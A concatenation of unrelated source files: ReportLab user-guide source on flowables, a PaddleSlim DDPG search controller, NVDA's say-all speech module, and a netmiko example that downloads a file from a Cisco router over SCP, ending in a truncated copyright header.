eg("""
DocPara('i',format='The value of i is %(__expr__)d',style=normal)
""")
heading2("""$DocAssert(self, cond, format=None)$""")
disc("""Raises an $AssertionError$ containing the $format$ string if $cond$ evaluates as $False$.""")
eg("""
DocAssert(val, 'val is False')
""")
heading2("""$DocIf(self, cond, thenBlock, elseBlock=[])$""")
disc("""If $cond$ evaluates as $True$, this flowable is replaced by the $thenBlock$ elsethe $elseBlock$.""")
eg("""
DocIf('i>3',Paragraph('The value of i is larger than 3',normal),\\
Paragraph('The value of i is not larger than 3',normal))
""")
heading2("""$DocWhile(self, cond, whileBlock)$""")
disc("""Runs the $whileBlock$ while $cond$ evaluates to $True$. E.g.:""")
eg("""
DocAssign('i',5)
DocWhile('i',[DocPara('i',format='The value of i is %(__expr__)d',style=normal),DocExec('i-=1')])
""")
disc("""This example produces a set of paragraphs of the form:""")
eg("""
The value of i is 5
The value of i is 4
The value of i is 3
The value of i is 2
The value of i is 1
""")
# Preformatted flowable documentation.
# Fixes: "splitted" -> "split", "coma" -> "comma" in the rendered text.
heading1("""Other Useful $Flowables$""")
heading2("""$Preformatted(text, style, bulletText=None, dedent=0, maxLineLength=None, splitChars=None, newLineChars=None)$""")
disc("""
Creates a preformatted paragraph which does no wrapping, line splitting or other manipulations.
No $XML$ style tags are taken account of in the text.
If dedent is non zero $dedent$ common leading
spaces will be removed from the front of each line.
""")
heading3("Defining a maximum line length")
disc("""
You can use the property $maxLineLength$ to define a maximum line length. If a line length exceeds this maximum value, the line will be automatically split.
""")
disc("""
The line will be split on any single character defined in $splitChars$. If no value is provided for this property, the line will be split on any of the following standard characters: space, colon, full stop, semi-colon, comma, hyphen, forward slash, back slash, left parenthesis, left square bracket and left curly brace
""")
disc("""
Characters can be automatically inserted at the beginning of each line that has been created. You can set the property $newLineChars$ to the characters you want to use.
""")
EmbeddedCode("""
from reportlab.lib.styles import getSampleStyleSheet
stylesheet=getSampleStyleSheet()
normalStyle = stylesheet['Code']
text='''
class XPreformatted(Paragraph):
def __init__(self, text, style, bulletText = None, frags=None, caseSensitive=1):
self.caseSensitive = caseSensitive
if maximumLineLength and text:
text = self.stopLine(text, maximumLineLength, splitCharacters)
cleaner = lambda text, dedent=dedent: ''.join(_dedenter(text or '',dedent))
self._setup(text, style, bulletText, frags, cleaner)
'''
t=Preformatted(text,normalStyle,maxLineLength=60, newLineChars='> ')
""")
# $XPreformatted$: the XML-markup-aware variant of $Preformatted$.
heading2("""$XPreformatted(text, style, bulletText=None, dedent=0, frags=None)$""")
disc("""
This is a non rearranging form of the $Paragraph$ class; XML tags are allowed in
$text$ and have the same meanings as for the $Paragraph$ class.
As for $Preformatted$, if dedent is non zero $dedent$ common leading
spaces will be removed from the front of each line.
""")
# Live example executed and rendered into the generated guide.
EmbeddedCode("""
from reportlab.lib.styles import getSampleStyleSheet
stylesheet=getSampleStyleSheet()
normalStyle = stylesheet['Code']
text='''
This is a non rearranging form of the <b>Paragraph</b> class;
<b><font color=red>XML</font></b> tags are allowed in <i>text</i> and have the same
meanings as for the <b>Paragraph</b> class.
As for <b>Preformatted</b>, if dedent is non zero <font color="red" size="+1">dedent</font>
common leading spaces will be removed from the
front of each line.
You can have &amp; style entities as well for & < > and ".
'''
t=XPreformatted(text,normalStyle,dedent=3)
""")
# $Image$ flowable documentation, with two live examples.
heading2("""$Image(filename, width=None, height=None)$""")
disc("""Create a flowable which will contain the image defined by the data in file $filename$ which can be
filepath, file like object or an instance of a $reportlab.graphics.shapes.Drawing$.
The default <b>PDF</b> image type <i>jpeg</i> is supported and if the <b>PIL</b> extension to <b>Python</b>
is installed the other image types can also be handled. If $width$ and or $height$ are specified
then they determine the dimension of the displayed image in <i>points</i>. If either dimension is
not specified (or specified as $None$) then the corresponding pixel dimension of the image is assumed
to be in <i>points</i> and used.
""")
I="../images/lj8100.jpg"
eg("""
Image("lj8100.jpg")
""",after=0.1)
disc("""will display as""")
try:
    getStory().append(Image(I))
except Exception:
    # Narrowed from a bare except: only swallow real errors (e.g. missing
    # sample image / missing PIL), not KeyboardInterrupt/SystemExit.
    disc("""An image should have appeared here.""")
disc("""whereas""")
eg("""
im = Image("lj8100.jpg", width=2*inch, height=2*inch)
im.hAlign = 'CENTER'
""", after=0.1)
disc('produces')
try:
    im = Image(I, width=2*inch, height=2*inch)
    im.hAlign = 'CENTER'
    # Fix: append the configured instance so the CENTER alignment shown in the
    # example actually takes effect (previously a fresh, default-aligned Image
    # was appended and `im` was discarded).
    getStory().append(im)
except Exception:
    disc("""An image should have appeared here.""")
heading2("""$Spacer(width, height)$""")
disc("""This does exactly as would be expected; it adds a certain amount of space into the story.
At present this only works for vertical space.
""")
# CPage(1): start a new page unless at least 1 inch remains on the current one.
CPage(1)
heading2("""$PageBreak()$""")
disc("""This $Flowable$ represents a page break. It works by effectively consuming all vertical
space given to it. This is sufficient for a single $Frame$ document, but would only be a
frame break for multiple frames so the $BaseDocTemplate$ mechanism
detects $pageBreaks$ internally and handles them specially.
""")
CPage(1)
heading2("""$CondPageBreak(height)$""")
disc("""This $Flowable$ attempts to force a $Frame$ break if insufficient vertical space remains
in the current $Frame$. It is thus probably wrongly named and should probably be renamed as
$CondFrameBreak$.
""")
CPage(1)
heading2("""$KeepTogether(flowables)$""")
disc("""
This compound $Flowable$ takes a list of $Flowables$ and attempts to keep them in the same $Frame$.
If the total height of the $Flowables$ in the list $flowables$ exceeds the current frame's available
space then all the space is used and a frame break is forced.
""")
CPage(1)
heading2("""$TableOfContents()$""")
disc("""
A table of contents can be generated by using the $TableOfContents$ flowable.
The following steps are needed to add a table of contents to your document:
""")
# TableOfContents usage documentation.
# Fix: "countaining" -> "containing" in the rendered text.
disc("""Create an instance of $TableOfContents$. Override the level styles (optional) and add the object to the story:""")
eg("""
toc = TableOfContents()
PS = ParagraphStyle
toc.levelStyles = [
PS(fontName='Times-Bold', fontSize=14, name='TOCHeading1',
leftIndent=20, firstLineIndent=-20, spaceBefore=5, leading=16),
PS(fontSize=12, name='TOCHeading2',
leftIndent=40, firstLineIndent=-20, spaceBefore=0, leading=12),
PS(fontSize=10, name='TOCHeading3',
leftIndent=60, firstLineIndent=-20, spaceBefore=0, leading=12),
PS(fontSize=10, name='TOCHeading4',
leftIndent=100, firstLineIndent=-20, spaceBefore=0, leading=12),
]
story.append(toc)
""")
disc("""Entries to the table of contents can be done either manually by calling
the $addEntry$ method on the $TableOfContents$ object or automatically by sending
a $'TOCEntry'$ notification in the $afterFlowable$ method of the $DocTemplate$
you are using.
The data to be passed to $notify$ is a list of three or four items containing
a level number, the entry text, the page number and an optional destination key
which the entry should point to.
This list will usually be created in a document template's method
like afterFlowable(), making notification calls using the notify()
method with appropriate data like this:
""")
eg('''
def afterFlowable(self, flowable):
"""Detect Level 1 and 2 headings, build outline,
and track chapter title."""
if isinstance(flowable, Paragraph):
txt = flowable.getPlainText()
if style == 'Heading1':
# ...
self.notify('TOCEntry', (0, txt, self.page))
elif style == 'Heading2':
# ...
key = 'h2-%s' % self.seq.nextf('heading2')
self.canv.bookmarkPage(key)
self.notify('TOCEntry', (1, txt, self.page, key))
# ...
''')
disc("""This way, whenever a paragraph of style $'Heading1'$ or $'Heading2'$ is added to the story, it will appear in the table of contents.
$Heading2$ entries will be clickable because a bookmarked key has been supplied.
""")
disc("""Finally you need to use the $multiBuild$ method of the DocTemplate because tables of contents need several passes to be generated:""")
eg("""
doc.multiBuild(story)
""")
disc("""Below is a simple but working example of a document with a table of contents:""")
# NOTE(review): in the example below `delta` (used for h2.leftIndent) is never
# defined in the snippet, so the example is not directly runnable as shown —
# TODO confirm against the upstream user guide before changing the example text.
eg('''
from reportlab.lib.styles import ParagraphStyle as PS
from reportlab.platypus import PageBreak
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate
from reportlab.platypus.tableofcontents import TableOfContents
from reportlab.platypus.frames import Frame
from reportlab.lib.units import cm
class MyDocTemplate(BaseDocTemplate):
def __init__(self, filename, **kw):
self.allowSplitting = 0
BaseDocTemplate.__init__(self, filename, **kw)
template = PageTemplate('normal', [Frame(2.5*cm, 2.5*cm, 15*cm, 25*cm, id='F1')])
self.addPageTemplates(template)
def afterFlowable(self, flowable):
"Registers TOC entries."
if flowable.__class__.__name__ == 'Paragraph':
text = flowable.getPlainText()
style = flowable.style.name
if style == 'Heading1':
self.notify('TOCEntry', (0, text, self.page))
if style == 'Heading2':
self.notify('TOCEntry', (1, text, self.page))
h1 = PS(name = 'Heading1',
fontSize = 14,
leading = 16)
h2 = PS(name = 'Heading2',
fontSize = 12,
leading = 14,
leftIndent = delta)
# Build story.
story = []
toc = TableOfContents()
# For conciseness we use the same styles for headings and TOC entries
toc.levelStyles = [h1, h2]
story.append(toc)
story.append(PageBreak())
story.append(Paragraph('First heading', h1))
story.append(Paragraph('Text in first heading', PS('body')))
story.append(Paragraph('First sub heading', h2))
story.append(Paragraph('Text in first sub heading', PS('body')))
story.append(PageBreak())
story.append(Paragraph('Second sub heading', h2))
story.append(Paragraph('Text in second sub heading', PS('body')))
story.append(Paragraph('Last heading', h1))
doc = MyDocTemplate('mintoc.pdf')
doc.multiBuild(story)
''')
# SimpleIndex documentation.
# Fix: "respresent" -> "represent" in the rendered text.
CPage(1)
heading2("""$SimpleIndex()$""")
disc("""
An index can be generated by using the $SimpleIndex$ flowable.
The following steps are needed to add an index to your document:
""")
disc("""Use the index tag in paragraphs to index terms:""")
eg('''
story = []
...
story.append('The third <index item="word" />word of this paragraph is indexed.')
''')
disc("""Create an instance of $SimpleIndex$ and add it to the story where you want it to appear:""")
eg('''
index = SimpleIndex(dot=' . ', headers=headers)
story.append(index)
''')
disc("""The parameters which you can pass into the SimpleIndex constructor are explained in the reportlab reference. Now, build the document by using the canvas maker returned by SimpleIndex.getCanvasMaker():""")
eg("""
doc.build(story, canvasmaker=index.getCanvasMaker())
""")
disc("""To build an index with multiple levels, pass a comma-separated list of items to the item attribute of an index tag:""")
eg("""
<index item="terma,termb,termc" />
<index item="terma,termd" />
""")
disc("""terma will represent the top-most level and termc the most specific term. termd and termb will appear in the same level inside terma.""")
disc("""If you need to index a term containing a comma, you will need to escape it by doubling it. To avoid the ambiguity of three consecutive commas (an escaped comma followed by a list separator or a list separator followed by an escaped comma?) introduce a space in the right position. Spaces at the beginning or end of terms will be removed.""")
eg("""
<index item="comma(,,), ,, ,... " />
""")
disc("""
This indexes the terms "comma (,)", "," and "...".
""")
# ListFlowable / ListItem: ordered and unordered (possibly nested) lists.
heading2("""$ListFlowable(),ListItem()$""")
disc("""
Use these classes to make ordered and unordered lists. Lists can be nested.
""")
disc("""
$ListFlowable()$ will create an ordered list, which can contain any flowable. The class has a number of parameters to change font, colour, size, style and position of list numbers, or of bullets in unordered lists. The type of numbering can also be set to use lower or upper case letters ('A,B,C' etc.) or Roman numerals (capitals or lowercase) using the bulletType property. To change the list to an unordered type, set bulletType='bullet'.
""")
disc("""
Items within a $ListFlowable()$ list can be changed from their default appearance by wrapping them in a $ListItem()$ class and setting its properties.
""")
disc("""
The following will create an ordered list, and set the third item to an unordered sublist.
""")
# Live example executed and rendered into the generated guide.
EmbeddedCode("""
from reportlab.platypus import ListFlowable, ListItem
from reportlab.lib.styles import getSampleStyleSheet
styles = getSampleStyleSheet()
style = styles["Normal"]
t = ListFlowable(
[
Paragraph("Item no.1", style),
ListItem(Paragraph("Item no. 2", style),bulletColor="green",value=7),
ListFlowable(
[
Paragraph("sublist item 1", style),
ListItem(Paragraph('sublist item 2', style),bulletColor='red',value='square')
],
bulletType='bullet',
start='square',
),
Paragraph("Item no.4", style),
],
bulletType='i'
)
""")
disc("""To cope with nesting the $start$ parameter can be set to a list of possible starts; for $ul$ acceptable starts are any unicode character or specific names known to flowables.py eg
$bulletchar$, $circle$, $square$, $disc$, $diamond$, $diamondwx$, $rarrowhead$, $sparkle$, $squarelrs$ or $blackstar$. For $ol$ the $start$ can be any character from $'1iaAI'$ to indicate different number styles.
""")
# BalancedColumns documentation.
# Fixes in the example: the class is named BalancedColumns (was "Balanced")
# and the keyword is spaceBefore (was misspelt "spacBefore").
heading2("""$BalancedColumns()$""")
disc("""Use the $BalancedColumns$ class to make a flowable that splits its content flowables into two or more roughly equal sized columns.
Effectively $n$ frames are synthesized to take the content and the flowable tries to balance the content between them. The created frames
will be split when the total height is too large and the split will maintain the balance.
""")
eg("""
from reportlab.platypus.flowables import BalancedColumns
from reportlab.platypus.frames import ShowBoundaryValue
F = [
list of flowables........
]
story.append(
BalancedColumns(
F, #the flowables we are balancing
nCols = 2, #the number of columns
needed = 72,#the minimum space needed by the flowable
spaceBefore = 0,
spaceAfter = 0,
showBoundary = None, #optional boundary showing
leftPadding=None, #these override the created frame
rightPadding=None, #paddings if specified else the
topPadding=None, #default frame paddings
bottomPadding=None, #are used
innerPadding=None, #the gap between frames if specified else
#use max(leftPadding,rightPadding)
name='', #for identification purposes when stuff goes awry
endSlack=0.1, #height disparity allowance ie 10% of available height
)
)
""")
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import parl
from parl import layers
import paddle
from paddle import fluid
from ..utils import RLCONTROLLER, action_mapping
from ...controller import RLBaseController
from .ddpg_model import DefaultDDPGModel as default_ddpg_model
from .noise import AdaptiveNoiseSpec as default_noise
from parl.utils import ReplayMemory
__all__ = ['DDPG']
class DDPGAgent(parl.Agent):
    """PARL agent wrapping a DDPG algorithm for the NAS controller.

    Builds static-graph prediction and learning programs and forwards
    predict/learn calls to them.
    """

    def __init__(self, algorithm, obs_dim, act_dim):
        # obs_dim/act_dim define the placeholder shapes used in build_program.
        assert isinstance(obs_dim, int)
        assert isinstance(act_dim, int)
        self.obs_dim = obs_dim
        self.act_dim = act_dim
        super(DDPGAgent, self).__init__(algorithm)
        # Attention: In the beginning, sync target model totally.
        self.alg.sync_target(decay=0)

    def build_program(self):
        # NOTE(review): presumably invoked by parl.Agent.__init__ as part of
        # the framework's setup protocol — confirm against the parl version in use.
        self.pred_program = paddle.static.Program()
        self.learn_program = paddle.static.Program()
        # Inference program: obs -> predicted action.
        with paddle.static.program_guard(self.pred_program):
            obs = fluid.data(
                name='obs', shape=[None, self.obs_dim], dtype='float32')
            self.pred_act = self.alg.predict(obs)
        # Training program: (obs, act, reward, next_obs, terminal) -> critic cost.
        with paddle.static.program_guard(self.learn_program):
            obs = fluid.data(
                name='obs', shape=[None, self.obs_dim], dtype='float32')
            act = fluid.data(
                name='act', shape=[None, self.act_dim], dtype='float32')
            reward = fluid.data(name='reward', shape=[None], dtype='float32')
            next_obs = fluid.data(
                name='next_obs', shape=[None, self.obs_dim], dtype='float32')
            terminal = fluid.data(
                name='terminal', shape=[None, 1], dtype='bool')
            _, self.critic_cost = self.alg.learn(obs, act, reward, next_obs,
                                                 terminal)

    def predict(self, obs):
        """Run the prediction program and return the action for `obs`."""
        act = self.fluid_executor.run(self.pred_program,
                                      feed={'obs': obs},
                                      fetch_list=[self.pred_act])[0]
        return act

    def learn(self, obs, act, reward, next_obs, terminal):
        """Run one training step and return the critic cost.

        Also soft-updates the target network via sync_target().
        """
        feed = {
            'obs': obs,
            'act': act,
            'reward': reward,
            'next_obs': next_obs,
            'terminal': terminal
        }
        critic_cost = self.fluid_executor.run(self.learn_program,
                                              feed=feed,
                                              fetch_list=[self.critic_cost])[0]
        self.alg.sync_target()
        return critic_cost
@RLCONTROLLER.register
class DDPG(RLBaseController):
    """DDPG-based RL controller for architecture/token search.

    Wraps a DDPGAgent plus a replay memory; `next_tokens` produces (optionally
    noised) actions mapped into `range_tables`, and `update` stores transitions
    and trains on sampled batches.
    """

    def __init__(self, range_tables, use_gpu=False, **kwargs):
        self.use_gpu = use_gpu
        # Ranges are exclusive upper bounds; shift to inclusive maxima.
        self.range_tables = range_tables - np.asarray(1)
        self.act_dim = len(self.range_tables)
        self.obs_dim = kwargs.get('obs_dim')
        # kwargs.get(key, default) is equivalent to the previous
        # `kwargs.get(key) if key in kwargs else default` but in one lookup.
        self.model = kwargs.get('model', default_ddpg_model)
        self.actor_lr = kwargs.get('actor_lr', 1e-4)
        self.critic_lr = kwargs.get('critic_lr', 1e-3)
        self.gamma = kwargs.get('gamma', 0.99)
        self.tau = kwargs.get('tau', 0.001)
        self.memory_size = kwargs.get('memory_size', 10)
        self.reward_scale = kwargs.get('reward_scale', 0.1)
        self.batch_size = kwargs.get('controller_batch_size', 1)
        self.actions_noise = kwargs.get('actions_noise', default_noise)
        self.action_dist = 0.0
        self.place = paddle.CUDAPlace(0) if self.use_gpu else paddle.CPUPlace()
        model = self.model(self.act_dim)
        if self.actions_noise:
            # Instantiate the noise class (default: AdaptiveNoiseSpec).
            self.actions_noise = self.actions_noise()
        algorithm = parl.algorithms.DDPG(
            model,
            gamma=self.gamma,
            tau=self.tau,
            actor_lr=self.actor_lr,
            critic_lr=self.critic_lr)
        self.agent = DDPGAgent(algorithm, self.obs_dim, self.act_dim)
        self.rpm = ReplayMemory(self.memory_size, self.obs_dim, self.act_dim)
        self.pred_program = self.agent.pred_program
        self.learn_program = self.agent.learn_program
        self.param_dict = self.get_params(self.learn_program)

    def next_tokens(self, obs, params_dict, is_inference=False):
        """Predict the next action tokens for `obs` using `params_dict`.

        During training (is_inference=False) Gaussian exploration noise is
        added and clipped to [-1, 1] before mapping into the token ranges.
        """
        batch_obs = np.expand_dims(obs, axis=0)
        self.set_params(self.pred_program, params_dict, self.place)
        actions = self.agent.predict(batch_obs.astype('float32'))
        # Add exploration noise to the action during training only.
        if self.actions_noise and not is_inference:
            actions_noise = np.clip(
                np.random.normal(
                    actions, scale=self.actions_noise.stdev_curr),
                -1.0,
                1.0)
            # Track mean |noise| so the adaptive noise can be updated later.
            self.action_dist = np.mean(np.abs(actions_noise - actions))
        else:
            actions_noise = actions
        actions_noise = action_mapping(actions_noise, self.range_tables)
        return actions_noise

    def _update_noise(self, actions_dist):
        # Let the adaptive noise adjust its stddev from the observed distance.
        self.actions_noise.update(actions_dist)

    def update(self, rewards, params_dict, obs, actions, obs_next, terminal):
        """Store a transition, train when enough samples exist, return params."""
        self.set_params(self.learn_program, params_dict, self.place)
        self.rpm.append(obs, actions, self.reward_scale * rewards, obs_next,
                        terminal)
        if self.actions_noise:
            self._update_noise(self.action_dist)
        # NOTE(review): ReplayMemory is capped at memory_size, so size() may
        # never strictly exceed it and this branch may never run — possibly
        # intended to be `>= self.batch_size`; confirm before changing.
        if self.rpm.size() > self.memory_size:
            # Bug fix: was bare `rpm.sample_batch(...)` which raised NameError;
            # the replay memory is an attribute, self.rpm.
            obs, actions, rewards, obs_next, terminal = self.rpm.sample_batch(
                self.batch_size)
            self.agent.learn(obs, actions, rewards, obs_next, terminal)
        params_dict = self.get_params(self.learn_program)
        return params_dict
|
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2006-2021 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Babbage B.V., Bill Dengler,
# Julien Cochuyt
from enum import IntEnum
from typing import TYPE_CHECKING
import weakref
import garbageHandler
from .speech import (
speak,
getTextInfoSpeech,
SpeakTextInfoState,
speakObject,
)
from logHandler import log
import config
import controlTypes
import api
import textInfos
import queueHandler
import winKernel
from .commands import CallbackCommand, EndUtteranceCommand
from .speechWithoutPauses import SpeechWithoutPauses
from .types import (
_flattenNestedSequences,
)
if TYPE_CHECKING:
import NVDAObjects
class CURSOR(IntEnum):
    """Which cursor say-all follows while reading."""
    CARET = 0
    REVIEW = 1
# Module-level singleton; populated by initialize() at startup.
SayAllHandler = None


def initialize():
    """Create the module's _SayAllHandler singleton with a fresh SpeechWithoutPauses."""
    global SayAllHandler
    SayAllHandler = _SayAllHandler(SpeechWithoutPauses(speakFunc=speak))
class _SayAllHandler:
    """Coordinates say-all (continuous reading).

    Holds the shared SpeechWithoutPauses instance and a weak reference to the
    currently active reader so the reader may be garbage collected once
    reading completes.
    """

    def __init__(self, speechWithoutPausesInstance: SpeechWithoutPauses):
        # Last CURSOR value passed to readText; None until readText is called.
        self.lastSayAllMode = None
        self.speechWithoutPausesInstance = speechWithoutPausesInstance
        #: The active say all manager.
        #: This is a weakref because the manager should be allowed to die once say all is complete.
        self._getActiveSayAll = lambda: None  # noqa: Return None when called like a dead weakref.

    def stop(self):
        '''
        Stops any active objects reader and resets the SayAllHandler's SpeechWithoutPauses instance
        '''
        active = self._getActiveSayAll()
        if active:
            active.stop()
        self.speechWithoutPausesInstance.reset()

    def isRunning(self):
        """Determine whether say all is currently running.
        @return: C{True} if say all is currently running, C{False} if not.
        @rtype: bool
        """
        return bool(self._getActiveSayAll())

    def readObjects(self, obj: 'NVDAObjects.NVDAObject'):
        """Start speaking `obj` and its descendants; replaces any active reader."""
        reader = _ObjectsReader(self, obj)
        self._getActiveSayAll = weakref.ref(reader)
        reader.next()

    def readText(self, cursor: CURSOR):
        """Start continuous text reading from the caret or review cursor."""
        self.lastSayAllMode = cursor
        try:
            reader = _TextReader(self, cursor)
        except NotImplementedError:
            # The object cannot supply a TextInfo; silently abort say all.
            log.debugWarning("Unable to make reader", exc_info=True)
            return
        self._getActiveSayAll = weakref.ref(reader)
        reader.nextLine()
class _ObjectsReader(garbageHandler.TrackedObject):
    """Speaks an object and its simple descendants one at a time.

    Each object is queued with a callback that advances to the next object
    once speech for the current one begins.
    """

    def __init__(self, handler: _SayAllHandler, root: 'NVDAObjects.NVDAObject'):
        self.handler = handler
        # Generator yielding root followed by its simple descendants, depth-first.
        self.walker = self.walk(root)
        # The object whose speech has just been queued; navigator follows it.
        self.prevObj = None

    def walk(self, obj: 'NVDAObjects.NVDAObject'):
        """Recursively yield `obj` and then every simple descendant in order."""
        yield obj
        child=obj.simpleFirstChild
        while child:
            for descendant in self.walk(child):
                yield descendant
            child=child.simpleNext

    def next(self):
        """Speak the next object, moving the navigator to the previous one."""
        if not self.walker:
            # We were stopped.
            return
        if self.prevObj:
            # We just started speaking this object, so move the navigator to it.
            api.setNavigatorObject(self.prevObj, isFocus=self.handler.lastSayAllMode == CURSOR.CARET)
            # Keep the system awake while say all is in progress.
            winKernel.SetThreadExecutionState(winKernel.ES_SYSTEM_REQUIRED)
        # Move onto the next object.
        self.prevObj = obj = next(self.walker, None)
        if not obj:
            # Walk exhausted; nothing more to speak.
            return
        # Call this method again when we start speaking this object.
        callbackCommand = CallbackCommand(self.next, name="say-all:next")
        speakObject(obj, reason=controlTypes.OutputReason.SAYALL, _prefixSpeechCommand=callbackCommand)

    def stop(self):
        """Abort the walk; next() becomes a no-op."""
        self.walker = None
class _TextReader(garbageHandler.TrackedObject):
    """Manages continuous reading of text.
    This is intended for internal use only.
    The high level flow of control is as follows:
    1. The constructor sets things up.
    2. L{nextLine} is called to read the first line.
    3. When it speaks a line, L{nextLine} request that L{lineReached} be called
    when we start speaking this line, providing the position and state at this point.
    4. When we start speaking a line, L{lineReached} is called
    and moves the cursor to that line.
    5. L{lineReached} calls L{nextLine}.
    6. If there are more lines, L{nextLine} works as per steps 3 and 4.
    7. Otherwise, if the object doesn't support page turns, we're finished.
    8. If the object does support page turns,
    we request that L{turnPage} be called when speech is finished.
    9. L{turnPage} tries to turn the page.
    10. If there are no more pages, we're finished.
    11. If there is another page, L{turnPage} calls L{nextLine}.
    """

    # Maximum lines queued without a natural pause before speech is forced.
    MAX_BUFFERED_LINES = 10

    def __init__(self, handler: _SayAllHandler, cursor: CURSOR):
        self.handler = handler
        self.cursor = cursor
        self.trigger = SayAllProfileTrigger()
        self.reader = None
        # Start at the cursor.
        if cursor == CURSOR.CARET:
            try:
                self.reader = api.getCaretObject().makeTextInfo(textInfos.POSITION_CARET)
            except (NotImplementedError, RuntimeError) as e:
                raise NotImplementedError("Unable to make TextInfo: " + str(e))
        else:
            self.reader = api.getReviewPosition()
        # #10899: SayAll profile can't be activated earlier because they may not be anything to read
        self.trigger.enter()
        self.speakTextInfoState = SpeakTextInfoState(self.reader.obj)
        self.numBufferedLines = 0

    def nextLine(self):
        """Queue speech for the next reading chunk, or finish/turn the page."""
        if not self.reader:
            log.debug("no self.reader")
            # We were stopped.
            return
        if not self.reader.obj:
            log.debug("no self.reader.obj")
            # The object died, so we should too.
            self.finish()
            return
        bookmark = self.reader.bookmark
        # Expand to the current line.
        # We use move end rather than expand
        # because the user might start in the middle of a line
        # and we don't want to read from the start of the line in that case.
        # For lines after the first, it's also more efficient because
        # we're already at the start of the line, so there's no need to search backwards.
        delta = self.reader.move(textInfos.UNIT_READINGCHUNK, 1, endPoint="end")
        if delta <= 0:
            # No more text.
            if isinstance(self.reader.obj, textInfos.DocumentWithPageTurns):
                # Once the last line finishes reading, try turning the page.
                cb = CallbackCommand(self.turnPage, name="say-all:turnPage")
                self.handler.speechWithoutPausesInstance.speakWithoutPauses([cb, EndUtteranceCommand()])
            else:
                self.finish()
            return
        # Copy the speakTextInfoState so that speak callbackCommand
        # and its associated callback are using a copy isolated to this specific line.
        state = self.speakTextInfoState.copy()

        # Call lineReached when we start speaking this line.
        # lineReached will move the cursor and trigger reading of the next line.
        def _onLineReached(obj=self.reader.obj, state=state):
            self.lineReached(obj, bookmark, state)

        cb = CallbackCommand(
            _onLineReached,
            name="say-all:lineReached"
        )

        # Generate the speech sequence for the reader textInfo
        # and insert the lineReached callback at the very beginning of the sequence.
        # _linePrefix on speakTextInfo cannot be used here
        # As it would be inserted in the sequence after all initial control starts which is too late.
        speechGen = getTextInfoSpeech(
            self.reader,
            unit=textInfos.UNIT_READINGCHUNK,
            reason=controlTypes.OutputReason.SAYALL,
            useCache=state
        )
        seq = list(_flattenNestedSequences(speechGen))
        seq.insert(0, cb)
        # Speak the speech sequence.
        spoke = self.handler.speechWithoutPausesInstance.speakWithoutPauses(seq)
        # Update the textInfo state ready for when speaking the next line.
        self.speakTextInfoState = state.copy()

        # Collapse to the end of this line, ready to read the next.
        try:
            self.reader.collapse(end=True)
        except RuntimeError:
            # This occurs in Microsoft Word when the range covers the end of the document.
            # without this exception to indicate that further collapsing is not possible, say all could enter an infinite loop.
            self.finish()
            return
        if not spoke:
            # This line didn't include a natural pause, so nothing was spoken.
            self.numBufferedLines += 1
            if self.numBufferedLines < self.MAX_BUFFERED_LINES:
                # Move on to the next line.
                # We queue this to allow the user a chance to stop say all.
                queueHandler.queueFunction(queueHandler.eventQueue, self.nextLine)
            else:
                # We don't want to buffer too much.
                # Force speech. lineReached will resume things when speech catches up.
                self.handler.speechWithoutPausesInstance.speakWithoutPauses(None)
                # The first buffered line has now started speaking.
                self.numBufferedLines -= 1

    def lineReached(self, obj, bookmark, state):
        """Called when speech for a line begins: move the cursor and continue."""
        # We've just started speaking this line, so move the cursor there.
        state.updateObj()
        updater = obj.makeTextInfo(bookmark)
        if self.cursor == CURSOR.CARET:
            updater.updateCaret()
        if self.cursor != CURSOR.CARET or config.conf["reviewCursor"]["followCaret"]:
            api.setReviewPosition(updater, isCaret=self.cursor == CURSOR.CARET)
        # Keep the system awake while say all is in progress.
        winKernel.SetThreadExecutionState(winKernel.ES_SYSTEM_REQUIRED)
        if self.numBufferedLines == 0:
            # This was the last line spoken, so move on.
            self.nextLine()
        else:
            self.numBufferedLines -= 1

    def turnPage(self):
        """Try to turn to the next page; stop if there are no more pages."""
        try:
            self.reader.obj.turnPage()
        except RuntimeError:
            log.debug("No more pages")
            # No more pages.
            self.stop()
            return
        self.reader = self.reader.obj.makeTextInfo(textInfos.POSITION_FIRST)
        self.nextLine()

    def finish(self):
        """Schedule cleanup once all queued speech has finished."""
        # There is no more text.
        # Call stop to clean up, but only after speech completely finishes.
        # Otherwise, if a different synth is being used for say all,
        # we might switch synths too early and truncate the final speech.
        # We do this by putting a CallbackCommand at the start of a new utterance.
        cb = CallbackCommand(self.stop, name="say-all:stop")
        self.handler.speechWithoutPausesInstance.speakWithoutPauses([
            EndUtteranceCommand(),
            cb,
            EndUtteranceCommand()
        ])

    def stop(self):
        """Stop reading and exit the say-all configuration profile trigger."""
        if not self.reader:
            # Already stopped.
            return
        self.reader = None
        self.trigger.exit()
        self.trigger = None

    def __del__(self):
        self.stop()
class SayAllProfileTrigger(config.ProfileTrigger):
    """A configuration profile trigger for when say all is in progress.
    """
    # Trigger identifier used by the configuration profile system.
    spec = "sayAll"
|
"""Download a file from a Cisco IOS device over SCP using netmiko.

Requires 'ip scp server enable' on the device and a privilege-15 account.
"""
import os
from getpass import getpass

from netmiko import ConnectHandler, file_transfer

# Code so automated tests will run properly.
# Fix: evaluate os.getenv only once ('' or unset both fall back to getpass).
password = os.getenv("NETMIKO_PASSWORD") or getpass()

# Need a privilege 15 account (no enable call)
cisco3 = {
    "device_type": "cisco_ios",
    "host": "cisco3.lasthop.io",
    "username": "pyclass",
    "password": password,
}

# Secure copy server must be enabled on the device ('ip scp server enable')
source_file = "test2.txt"
dest_file = "test2.txt"
direction = "get"  # "get" copies device -> local; "put" would upload
file_system = "flash:"

ssh_conn = ConnectHandler(**cisco3)
transfer_dict = file_transfer(
    ssh_conn,
    source_file=source_file,
    dest_file=dest_file,
    file_system=file_system,
    direction=direction,
    # Overwrite the target file (if it already exists)
    overwrite_file=True,  # default "will not overwrite"
    # verify_file=True,  # default "will verify"
)

print(transfer_dict)
ssh_conn.disconnect()
|
"""
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
